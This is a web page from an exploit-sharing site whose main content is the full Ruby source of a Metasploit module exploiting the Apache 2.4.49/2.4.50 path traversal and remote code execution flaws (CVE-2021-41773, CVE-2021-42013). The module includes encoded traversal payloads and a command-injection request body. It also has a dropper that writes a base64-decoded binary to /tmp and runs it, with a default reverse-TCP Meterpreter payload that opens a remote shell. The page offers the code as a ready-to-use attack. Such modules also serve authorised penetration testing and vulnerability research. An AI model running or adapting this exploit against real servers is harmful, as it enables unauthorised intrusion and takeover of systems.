0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::CheckModule
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',
'Description' => %q{
This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).
If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled,
it can be used to execute arbitrary commands (Remote Command Execution).
This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).
},
'References' => [
['CVE', '2021-41773'],
['CVE', '2021-42013'],
['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],
['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],
['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],
['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],
['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']
],
'Author' => [
'Ash Daulton', # Vulnerability discovery
'Dhiraj Mishra', # Metasploit auxiliary module
'mekhalleh (RAMELLA Sébastien)' # Metasploit exploit module (Zeop Entreprise)
],
'DisclosureDate' => '2021-05-10',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
'DefaultOptions' => {
'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',
'Action' => 'CHECK_RCE',
'RPORT' => 443,
'SSL' => true
},
'Targets' => [
[
'Automatic (Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'DisablePayloadHandler' => 'false'
}
}
],
[
'Unix Command (In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_command,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic',
'DisablePayloadHandler' => 'true'
}
}
],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),
OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),
OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])
])
end
def cmd_unix_generic?
datastore['PAYLOAD'] == 'cmd/unix/generic'
end
def execute_command(command, _opts = {})
traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'
uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)
response = send_request_raw({
'method' => Rex::Text.rand_text_alpha(3..4),
'uri' => uri,
'data' => "#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}"
})
if response && response.body
return response.body
end
false
end
def message(msg)
"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
end
def pick_payload
case datastore['CVE']
when 'CVE-2021-41773'
payload = '.%2e/'
when 'CVE-2021-42013'
payload = '.%%32%65/'
else
payload = ''
end
payload
end
def exploit
@proto = (ssl ? 'https' : 'http')
if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
end
print_status(message("Attempt to exploit for #{datastore['CVE']}"))
case target['Type']
when :linux_dropper
file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
print_status(message("Sending #{datastore['PAYLOAD']} command payload"))
vprint_status(message("Generated command payload: #{cmd}"))
execute_command(cmd)
register_file_for_cleanup file_name
when :unix_command
vprint_status(message("Generated payload: #{payload.encoded}"))
if !cmd_unix_generic?
execute_command(payload.encoded)
else
received = execute_command(payload.encoded.to_s)
print_warning(message('Dumping command output in response'))
if !received
print_error(message('Empty response, no command output'))
return
end
print_line(received)
end
end
end
end
# 0day.today [2024-11-16] #